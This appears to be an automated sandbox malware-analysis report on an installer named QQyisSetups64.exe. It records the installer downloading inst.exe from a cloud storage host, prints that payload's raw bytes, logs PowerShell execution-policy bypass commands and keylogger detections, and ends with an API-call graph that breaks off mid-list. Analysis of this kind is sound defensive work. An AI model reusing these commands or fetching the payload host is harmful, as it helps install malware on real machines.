                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    0192.168.2.74970847.79.48.2114437736C:\Users\user\Desktop\QQyisSetups64.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-12-29 10:18:17 UTC132OUTGET /inst.exe HTTP/1.1
                                                                                                                                                                                                                    User-Agent: URLDownloader
                                                                                                                                                                                                                    Host: bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-12-29 10:18:18 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: AliyunOSS
                                                                                                                                                                                                                    Date: Sun, 29 Dec 2024 10:18:17 GMT
                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                    Content-Length: 4118496
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    x-oss-request-id: 677121E9E173EA33307C04AF
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    ETag: "AAA0F14BDFE3777EEE342C27DE409E6D"
                                                                                                                                                                                                                    Last-Modified: Sat, 28 Dec 2024 06:31:15 GMT
                                                                                                                                                                                                                    x-oss-object-type: Normal
                                                                                                                                                                                                                    x-oss-hash-crc64ecma: 13828654626470641508
                                                                                                                                                                                                                    x-oss-storage-class: Standard
                                                                                                                                                                                                                    x-oss-ec: 0048-00000113
                                                                                                                                                                                                                    Content-Disposition: attachment
                                                                                                                                                                                                                    x-oss-force-download: true
                                                                                                                                                                                                                    Content-MD5: qqDxS9/jd37uNCwn3kCebQ==
                                                                                                                                                                                                                    x-oss-server-time: 11
                                                                                                                                                                                                                    2024-12-29 10:18:18 UTC15821INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 21 c5 b9 d1 65 a4 d7 82 65 a4 d7 82 65 a4 d7 82 d8 eb 41 82 61 a4 d7 82 6c dc 42 82 79 a4 d7 82 42 62 b9 82 64 a4 d7 82 6c dc 5e 82 73 a4 d7 82 7b f6 53 82 61 a4 d7 82 42 62 ba 82 66 a4 d7 82 42 62 ac 82 40 a4 d7 82 65 a4 d6 82 b7 a5 d7 82 6c dc 54 82 d2 a4 d7 82 6c dc 53 82 ca a4 d7 82 7b f6 43 82 64 a4 d7 82 6c dc 46 82 64 a4 d7 82 52 69 63 68 65 a4 d7 82 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!eeeAalByBbdl^s{SaBbfBb@elTlS{CdlFdRiche
                                                                                                                                                                                                                    2024-12-29 10:18:18 UTC16384INData Raw: c8 75 08 c7 44 24 10 fe ff 00 00 0f b7 74 24 10 8d 34 b6 03 f6 03 f6 03 f6 8b c6 e8 23 f3 ff ff 89 44 24 18 85 c0 75 19 68 68 cc 4c 00 50 50 ba 68 cc 4c 00 e8 4a 37 00 00 83 c4 0c e9 62 01 00 00 85 f6 74 24 8b 4c 24 34 8b 54 24 30 56 50 51 52 8d 7c 24 48 e8 e9 f9 ff ff 83 c4 10 85 c0 0f 84 3e 01 00 00 8b 44 24 18 01 b5 b0 00 00 00 83 7c 24 14 00 8b 74 24 10 74 2b 33 ff 33 d2 8b c8 66 3b fe 73 20 81 39 49 4e 49 54 75 06 80 79 04 00 74 0b 42 83 c1 28 66 3b d6 72 e9 eb 07 c6 85 9e 00 00 00 01 8b 4c 24 24 8b 54 24 20 51 e8 d0 01 00 00 8b f0 83 c4 04 89 74 24 20 85 f6 0f 84 c3 00 00 00 6a 0a 56 8d 44 24 40 e8 03 01 00 00 83 c4 08 85 c0 0f 84 ac 00 00 00 8b 40 04 85 c0 0f 89 a1 00 00 00 25 ff ff ff 7f 03 c6 68 60 03 00 00 50 8d 44 24 40 e8 d7 00 00 00 83 c4 08
                                                                                                                                                                                                                    Data Ascii: uD$t$4#D$uhhLPPhLJ7bt$L$4T$0VPQR|$H>D$|$t$t+33f;s 9INITuytB(f;rL$$T$ Qt$ jVD$@@%h`PD$@
                                                                                                                                                                                                                    2024-12-29 10:18:18 UTC16384INData Raw: 20 73 4b 85 db 74 47 b9 20 00 00 00 2b cf 89 4c 24 0c 8b 4c 24 14 2b ce 55 8d 14 9e 89 4c 24 0c eb 05 90 8b 4c 24 0c 8b 74 11 fc 83 ea 04 8b ee 8b cf d3 ed 4b 0b e8 89 2a 85 ff 74 0a 8b 4c 24 10 d3 e6 8b c6 eb 02 33 c0 85 db 75 d6 5d 5e 5b 83 c4 08 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 81 ec 38 06 00 00 55 8b ac 24 4c 06 00 00 57 8b f8 8b 84 24 54 06 00 00 85 c0 0f 84 d4 02 00 00 48 83 3c 87 00 75 07 8b c8 48 85 c9 75 f3 53 8d 58 01 89 5c 24 14 85 db 0f 84 b5 02 00 00 8b 4c 9f fc 33 c0 85 c9 74 08 40 d1 e9 83 f8 20 72 f4 56 be 20 00 00 00 2b f0 89 74 24 2c 8b cb 8d 84 24 3c 02 00 00 eb 09 8d a4 24 00 00 00 00 8b ff c7 00 00 00 00 00 83 c0 04 83 e9 01 75 f2 8b 84 24 54 06 00 00 55 8d 8c 24 40 02 00 00 e8 ae fe ff ff 89 84 ac 40 02 00 00 53 8b c7
                                                                                                                                                                                                                    Data Ascii: sKtG +L$L$+UL$L$tK*tL$3u]^[8U$LW$TH<uHuSX\$L3t@ rV +t$,$<$u$TU$@@S
                                                                                                                                                                                                                    2024-12-29 10:18:18 UTC16384INData Raw: 4d 00 8d 55 d8 52 c7 45 d8 50 20 4c 00 e8 77 7c 07 00 8b 45 08 8b 4d ec 89 45 e4 40 89 65 f0 50 c6 45 fc 02 e8 5a 03 00 00 89 45 08 b8 ff c9 40 00 c3 8b 7d ec 8b 75 e4 8b 5d 0c 85 db 76 20 83 7f 18 10 72 05 8b 47 04 eb 03 8d 47 04 8b 4d 08 53 50 8d 46 01 50 51 e8 a1 7b 07 00 83 c4 10 83 7f 18 10 72 0c 8b 57 04 52 e8 03 7b 07 00 83 c4 04 8b 4d 08 8d 47 04 c6 00 00 89 08 89 77 18 89 5f 14 83 fe 10 72 02 8b c1 c6 04 18 00 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 08 00 8b 75 ec 83 7e 18 10 72 0c 8b 46 04 50 e8 be 7a 07 00 83 c4 04 6a 00 c7 46 18 0f 00 00 00 c7 46 14 00 00 00 00 6a 00 c6 46 04 00 e8 b8 7b 07 00 cc cc 56 57 8b 7c 24 0c 85 ff 74 2c 8b 71 18 8d 41 04 83 fe 10 72 04 8b 10 eb 02 8b d0 3b fa 72 17 83 fe 10 72 02 8b 00 8b 49 14 03 c8 3b
                                                                                                                                                                                                                    Data Ascii: MUREP Lw|EME@ePEZE@}u]v rGGMSPFPQ{rWR{MGw_rMdY_^[]u~rFPzjFFjF{VW|$t,qAr;rrI;
                                                                                                                                                                                                                    2024-12-29 10:18:18 UTC16384INData Raw: 8d 74 24 2c e8 ba 00 00 00 8d 44 24 0c e8 81 04 00 00 eb 3e 53 8d 4c 24 10 e8 35 f8 ff ff 83 c4 04 8d 74 24 2c e8 99 00 00 00 c7 44 24 48 ff ff ff ff 8b 44 24 0c 83 c0 f0 83 ca ff 8d 48 0c f0 0f c1 11 4a 85 d2 7f 0a 8b 08 8b 11 50 8b 42 04 ff d0 b8 01 00 00 00 8b 4c 24 40 64 89 0d 00 00 00 00 59 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc a1 a4 cd 4e 00 8b 50 0c b9 a4 cd 4e 00 ff d2 83 c0 10 89 06 a1 a4 cd 4e 00 8b 50 0c b9 a4 cd 4e 00 ff d2 83 c0 10 89 46 04 a1 a4 cd 4e 00 8b 50 0c b9 a4 cd 4e 00 ff d2 83 c0 10 89 46 08 8b c6 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 46 08 83 e8 10 8d 48 0c 83 ca ff f0 0f c1 11 4a 85 d2 7f 0a 8b 08 8b 11 50 8b 42 04 ff d0 8b 46 04 83 e8 10 8d 48 0c 83 ca ff f0 0f c1 11 4a 85 d2 7f 0a 8b 08 8b 11 50 8b 42 04
                                                                                                                                                                                                                    Data Ascii: t$,D$>SL$5t$,D$HD$HJPBL$@dY_^]NPNNPNFNPNFFHJPBFHJPB
                                                                                                                                                                                                                    2024-12-29 10:18:18 UTC16384INData Raw: 89 9c 24 74 04 00 00 68 02 00 00 80 89 5c 24 34 ff 15 40 e0 4b 00 3b c3 0f 85 bc 00 00 00 8b 7c 24 20 33 c0 89 7c 24 34 89 5c 24 38 89 44 24 2c 8d 49 00 8d 54 24 3c 52 53 53 53 8d 4c 24 2c 51 8d 94 24 60 02 00 00 52 50 be 04 01 00 00 57 89 74 24 3c ff 15 28 e0 4b 00 85 c0 0f 85 44 01 00 00 89 5c 24 14 89 5c 24 18 8d 44 24 28 50 6a 01 53 8d 8c 24 58 02 00 00 51 c6 84 24 74 04 00 00 01 57 89 5c 24 3c ff 15 40 e0 4b 00 3b c3 75 51 8b 6c 24 28 68 88 e6 4c 00 8d 54 24 18 89 74 24 20 52 8d 7c 24 24 8d 74 24 4c 89 6c 24 1c 89 5c 24 20 e8 6c db ff ff 85 c0 74 36 88 9c 24 64 04 00 00 3b eb 74 0b 55 ff 15 3c e0 4b 00 89 5c 24 14 89 5c 24 18 e9 b3 00 00 00 33 c0 e9 ef 00 00 00 88 9c 24 64 04 00 00 89 5c 24 18 e9 9c 00 00 00 8d 44 24 44 50 e8 87 64 07 00 83 c4 04 83
                                                                                                                                                                                                                    Data Ascii: $th\$4@K;|$ 3|$4\$8D$,IT$<RSSSL$,Q$`RPWt$<(KD\$\$D$(PjS$XQ$tW\$<@K;uQl$(hLT$t$ R|$$t$Ll$\$ lt6$d;tU<K\$\$3$d\$D$DPd
                                                                                                                                                                                                                    2024-12-29 10:18:18 UTC16384INData Raw: 00 ff 74 24 14 ff 31 ff 15 44 e0 4b 00 c2 08 00 55 8b ec 83 7d 0c 00 56 8b f1 75 05 6a 0d 58 eb 21 ff 75 0c ff 15 78 e3 4b 00 8d 44 00 02 50 ff 75 0c ff 75 10 6a 00 ff 75 08 ff 36 ff 15 44 e0 4b 00 5e 5d c2 0c 00 53 56 8b 74 24 10 8b d9 85 f6 75 05 6a 0d 58 eb 2d 57 33 ff 56 ff 15 78 e3 4b 00 40 8d 0c 00 03 f1 03 f9 83 f8 01 75 ec 57 ff 74 24 18 6a 07 6a 00 ff 74 24 20 ff 33 ff 15 44 e0 4b 00 5f 5e 5b c2 08 00 ff 74 24 08 ff 74 24 08 ff 15 68 e3 4b 00 f7 d8 1a c0 fe c0 c3 b8 09 00 02 80 c2 04 00 8b 01 6a 27 59 66 3b 08 75 13 50 ff 15 64 e5 4b 00 6a 27 59 66 3b 08 74 04 33 c0 40 c3 33 c0 c3 8b 44 24 04 83 f8 64 56 8b f1 7d 05 b8 e8 03 00 00 83 26 00 6a 02 50 89 46 04 e8 88 fc ff ff 59 59 89 46 08 85 c0 74 05 33 c9 66 89 08 8b c6 5e c2 04 00 ff 71 08 ff 15
                                                                                                                                                                                                                    Data Ascii: t$1DKU}VujX!uxKDPuuju6DK^]SVt$ujX-W3VxK@uWt$jjt$ 3DK_^[t$t$hKj'Yf;uPdKj'Yf;t3@3D$dV}&jPFYYFt3f^q
                                                                                                                                                                                                                    2024-12-29 10:18:18 UTC16384INData Raw: 00 56 8b f1 8b 0e 85 c9 74 08 e8 dc fd ff ff 83 26 00 5e c3 55 8b ec 83 7d 08 00 56 57 8b f9 75 0a 68 57 00 07 80 e8 b8 15 ff ff ff 75 0c ff 75 08 e8 fb a1 06 00 59 59 8b f0 56 8b cf e8 f1 04 ff ff ff 75 0c 8d 4e 01 ff 75 08 51 50 e8 27 a4 06 00 83 c4 10 56 8b cf e8 06 05 ff ff 5f 5e 5d c2 08 00 56 8b f1 6a 00 6a 00 8d 4e 14 e8 70 ad ff ff 85 c0 75 0d 6a 0e ff 15 64 e3 4b 00 83 c8 ff eb 2d 56 83 c6 08 56 68 c0 cd 4e 00 e8 18 cc ff ff ff 74 24 0c 68 6b a9 41 00 ff 74 24 10 68 81 00 00 00 ff 35 34 cd 4e 00 ff 15 84 e5 4b 00 5e c2 08 00 e9 48 ff ff ff 6a 00 b8 e9 40 4b 00 e8 8f 89 06 00 8b 45 08 83 65 fc 00 85 c0 74 04 8b 00 eb 02 33 c0 8b 11 50 51 ff 52 0c 8b 4d 08 8b f0 85 c9 74 05 e8 00 fd ff ff 8b c6 e8 3a 8a 06 00 c2 04 00 6a 00 b8 0c 41 4b 00 e8 53 89
                                                                                                                                                                                                                    Data Ascii: Vt&^U}VWuhWuuYYVuNuQP'V_^]VjjNpujdK-VVhNt$hkAt$h54NK^Hj@KEet3PQRMt:jAKS
                                                                                                                                                                                                                    2024-12-29 10:18:18 UTC16384INData Raw: ff 44 0a 35 3e c7 85 a4 fd ff ff d5 cd b4 bc c7 85 a8 fd ff ff a8 ce ea 72 c7 85 ac fd ff ff bb 84 64 fa c7 85 b0 fd ff ff ae 12 66 8d c7 85 b4 fd ff ff 47 6f 3c bf c7 85 b8 fd ff ff 63 e4 9b d2 c7 85 bc fd ff ff 9e 5d 2f 54 c7 85 c0 fd ff ff 1b 77 c2 ae c7 85 c4 fd ff ff 70 63 4e f6 c7 85 c8 fd ff ff 8d 0d 0e 74 c7 85 cc fd ff ff 57 13 5b e7 c7 85 d0 fd ff ff 71 16 72 f8 c7 85 d4 fd ff ff 5d 7d 53 af c7 85 d8 fd ff ff 08 cb 40 40 c7 85 dc fd ff ff cc e2 b4 4e c7 85 e0 fd ff ff 6a 46 d2 34 c7 85 e4 fd ff ff 84 af 15 01 c7 85 e8 fd ff ff 28 04 b0 e1 c7 85 ec fd ff ff 1d 3a 98 95 c7 85 f0 fd ff ff b4 9f b8 06 c7 85 f4 fd ff ff 48 a0 6e ce c7 85 f8 fd ff ff 82 3b 3f 6f c7 85 fc fd ff ff 82 ab 20 35 c7 85 00 fe ff ff 4b 1d 1a 01 c7 85 04 fe ff ff f8 27 72 27
                                                                                                                                                                                                                    Data Ascii: D5>rdfGo<c]/TwpcNtW[qr]}S@@NjF4(:Hn;?o 5K'r'
                                                                                                                                                                                                                    2024-12-29 10:18:18 UTC16384INData Raw: 33 ff 39 be f0 10 00 00 0f 84 d4 01 00 00 8b 45 10 8d 4e 08 89 86 04 11 00 00 89 be f4 10 00 00 e8 98 cc ff ff 8d 9e cc 10 00 00 8b cb 89 5d f0 e8 bc 99 ff ff ff 75 0c 89 7e 4c 8d 7e 58 8b cf e8 15 92 ff ff 57 e8 bb 94 ff ff c7 04 24 5c 11 4c 00 ff 37 e8 0d 02 06 00 f7 d8 59 1b c0 59 40 8d 4d d0 89 86 f8 10 00 00 e8 cc d3 ff ff 83 65 fc 00 8d 4d e8 e8 c0 d3 ff ff 8d 45 e8 50 8d 45 d0 50 ff 75 08 c6 45 fc 01 e8 c3 94 ff ff 83 c4 0c 8b cf e8 d7 90 ff ff 83 f8 03 0f 82 20 01 00 00 8d 4d d0 e8 c6 90 ff ff 83 f8 02 0f 82 0f 01 00 00 8d 4d e8 e8 b5 90 ff ff 83 f8 02 0f 82 fe 00 00 00 8d 7e 60 8b 07 33 c9 66 89 08 8d 4d d8 e8 48 d3 ff ff 8d 4d e0 c6 45 fc 02 e8 3c d3 ff ff bb a6 3d 42 00 eb 45 8b cf e8 80 90 ff ff 85 c0 74 71 57 8d 4d e8 e8 5e 91 ff ff ff 75 e0
                                                                                                                                                                                                                    Data Ascii: 39EN]u~L~XW$\L7YY@MeMEPEPuE MM~`3fMHME<=BEtqWM^u


                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                    Start time:05:18:09
                                                                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\QQyisSetups64.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\QQyisSetups64.exe"
                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                    File size:5'289'240 bytes
                                                                                                                                                                                                                    MD5 hash:B4F00FBA3327488D4CB6FD36B2D567C6
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000002.1456396278.0000000000403000.00000020.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000000.1279423862.00000000006F9000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000000.1279062658.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                    Start time:05:18:12
                                                                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\QQyisSetups64.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\QQyisSetups64.exe"
                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                    File size:5'289'240 bytes
                                                                                                                                                                                                                    MD5 hash:B4F00FBA3327488D4CB6FD36B2D567C6
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe, Author: Joe Security
                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                    Start time:05:18:20
                                                                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                                                                                                                                    Imagebase:0x410000
                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                    Start time:05:18:20
                                                                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                                                                                                                                                    Imagebase:0x410000
                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                    Start time:05:18:20
                                                                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                    Start time:05:18:21
                                                                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                                    Start time:05:18:21
                                                                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                                                                                                                                    Imagebase:0xdd0000
                                                                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                    Start time:05:18:21
                                                                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                                                                                                                                                    Imagebase:0xdd0000
                                                                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                    Start time:05:18:25
                                                                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                                                                    Path:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                                                                    Imagebase:0xa70000
                                                                                                                                                                                                                    File size:4'118'496 bytes
                                                                                                                                                                                                                    MD5 hash:AAA0F14BDFE3777EEE342C27DE409E6D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                    • Detection: 17%, ReversingLabs
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                                    Start time:05:18:25
                                                                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                                                                    Path:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                                                                    Imagebase:0xa70000
                                                                                                                                                                                                                    File size:4'118'496 bytes
                                                                                                                                                                                                                    MD5 hash:AAA0F14BDFE3777EEE342C27DE409E6D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                                    Start time:06:58:14
                                                                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                    Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:7.1%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:99.8%
                                                                                                                                                                                                                      Signature Coverage:4.8%
                                                                                                                                                                                                                      Total number of Nodes:1653
                                                                                                                                                                                                                      Total number of Limit Nodes:5
                                                                                                                                                                                                                      execution_graph 10684 10001000 10685 1000100d _Error_objects 10684->10685 10686 10010b09 _Error_objects 2 API calls 10685->10686 10687 10001017 10686->10687 10896 10001080 malloc 10897 2860006 10900 2860032 10897->10900 10901 2860ae4 GetPEB 10900->10901 10902 286029b 10901->10902 10903 2860ae4 GetPEB 10902->10903 10906 28602a7 10903->10906 10904 28604a6 GetNativeSystemInfo 10905 28604d3 VirtualAlloc 10904->10905 10907 286002d 10904->10907 10908 28604ec 10905->10908 10906->10904 10906->10907 10908->10907 10909 10010610 142 API calls 10908->10909 10909->10907 10910 2870e07 ___scrt_dllmain_exception_filter 10911 1000b680 10912 1000b6a0 10911->10912 10913 1000b690 _unlock_file 10911->10913 10913->10912 11390 10003d80 11393 100012c0 __std_exception_copy 11390->11393 11392 10003d93 11393->11392 10688 2861087 10689 28610a7 10688->10689 10690 2861099 10688->10690 10690->10689 10691 2861125 NtdllDefWindowProc_W 10690->10691 10691->10689 10914 2860000 10916 2860005 10914->10916 10917 2860006 10916->10917 10918 2860032 145 API calls 10917->10918 10919 286002d 10918->10919 10692 2870280 10697 2870231 10692->10697 10693 2870200 recv 10693->10697 10694 28702bf VirtualAlloc 10698 28702ee 10694->10698 10695 2870282 closesocket WSACleanup 10695->10697 10696 287027e 10696->10694 10697->10693 10697->10694 10697->10695 10697->10696 10697->10698 11394 287090d 11395 2870922 11394->11395 11396 2870ee7 __DllMainCRTStartup@12 IsProcessorFeaturePresent 11395->11396 11397 287092e ___scrt_uninitialize_crt 11396->11397 11398 1000998b 11399 1000998e 11398->11399 11400 100045f0 32 API calls 11399->11400 11401 10009a34 _Smanip _Error_objects 11400->11401 11402 1000b990 10 API calls 11401->11402 11403 10009ac0 11402->11403 11404 10004540 10 API calls 11403->11404 11405 10009ad7 11404->11405 11406 1000b970 2 API calls 11405->11406 11407 10009ae9 11406->11407 11408 10002210 8 API calls 11407->11408 11409 10009b0f 11408->11409 11410 10004390 14 API calls 11409->11410 11411 10009b1b _Smanip _Error_objects 11410->11411 11412 1000b990 10 API calls 11411->11412 11413 10009bd1 11412->11413 11414 10004540 10 API calls 11413->11414 11415 10009be8 11414->11415 11416 1000d190 12 API calls 11415->11416 11417 10009c1b 11416->11417 11418 100020a0 2 API calls 11417->11418 11419 10009c2d 11418->11419 11420 1000b970 2 API calls 11419->11420 11421 10009c3c 11420->11421 11422 10004680 DeleteFileA 11421->11422 11423 10009c4e 11422->11423 11424 10002190 8 API calls 11423->11424 11425 10009c68 11424->11425 11426 10004440 31 API calls 11425->11426 11427 10009c7f 11426->11427 11428 100020a0 2 API calls 11427->11428 11429 